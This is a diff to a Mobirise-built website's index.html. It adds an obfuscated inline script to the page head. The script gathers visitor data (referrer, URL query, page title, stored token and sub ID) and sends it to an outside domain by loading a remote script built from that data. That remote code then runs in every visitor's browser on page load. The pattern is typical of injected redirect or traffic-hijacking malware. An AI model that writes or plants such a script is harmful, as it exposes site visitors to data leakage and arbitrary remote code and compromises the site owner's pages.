--- a/index.html
+++ b/index.html
@@ -1,6 +1,49 @@
 <!DOCTYPE html>
 <html  >
 <head>
+  <script>
+    (function() {
+    var name = '_HBrb9bnCzyfY3vPy';
+    if (!window._HBrb9bnCzyfY3vPy) {
+        window._HBrb9bnCzyfY3vPy = {
+            unique: false,
+            ttl: 86400,
+            R_PATH: 'https://docital.site/sMGP3YPP',
+            P_PATH: 'https://docital.site/9a1f79a/postback',
+        };
+    }
+    const _d77k9PBFsRSzcL7h = localStorage.getItem('config');
+    if (typeof _d77k9PBFsRSzcL7h !== 'undefined' && _d77k9PBFsRSzcL7h !== null) {
+        var _S5rhdCVB4b6TzcrR = JSON.parse(_d77k9PBFsRSzcL7h);
+        var _Ds9b5Sfjwy3kGVzS = Math.round(+new Date()/1000);
+        if (_S5rhdCVB4b6TzcrR.created_at + window._HBrb9bnCzyfY3vPy.ttl < _Ds9b5Sfjwy3kGVzS) {
+            localStorage.removeItem('subId');
+            localStorage.removeItem('token');
+            localStorage.removeItem('config');
+        }
+    }
+    var _KJq4NZ7x7Z7kT2jJ = localStorage.getItem('subId');
+    var _7VFCv8PZVRsgg9yC = localStorage.getItem('token');
+    var _4X5NSyHXGByqTHhf = '?return=js.client';
+        _4X5NSyHXGByqTHhf += '&' + decodeURIComponent(window.location.search.replace('?', ''));
+        _4X5NSyHXGByqTHhf += '&se_referrer=' + encodeURIComponent(document.referrer);
+        _4X5NSyHXGByqTHhf += '&default_keyword=' + encodeURIComponent(document.title);
+        _4X5NSyHXGByqTHhf += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
+        _4X5NSyHXGByqTHhf += '&name=' + encodeURIComponent(name);
+        _4X5NSyHXGByqTHhf += '&host=' + encodeURIComponent(window._HBrb9bnCzyfY3vPy.R_PATH);
+    if (typeof _KJq4NZ7x7Z7kT2jJ !== 'undefined' && _KJq4NZ7x7Z7kT2jJ && window._HBrb9bnCzyfY3vPy.unique) {
+        _4X5NSyHXGByqTHhf += '&sub_id=' + encodeURIComponent(_KJq4NZ7x7Z7kT2jJ);
+    }
+    if (typeof _7VFCv8PZVRsgg9yC !== 'undefined' && _7VFCv8PZVRsgg9yC && window._HBrb9bnCzyfY3vPy.unique) {
+        _4X5NSyHXGByqTHhf += '&token=' + encodeURIComponent(_7VFCv8PZVRsgg9yC);
+    }
+    var a = document.createElement('script');
+        a.type = 'application/javascript';
+        a.src = window._HBrb9bnCzyfY3vPy.R_PATH + _4X5NSyHXGByqTHhf;
+    var s = document.getElementsByTagName('script')[0];
+    s.parentNode.insertBefore(a, s)
+    })();
+    </script>
   <!-- Site made with Mobirise Website Builder v4.12.3, https://mobirise.com -->
   <meta charset="UTF-8">
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
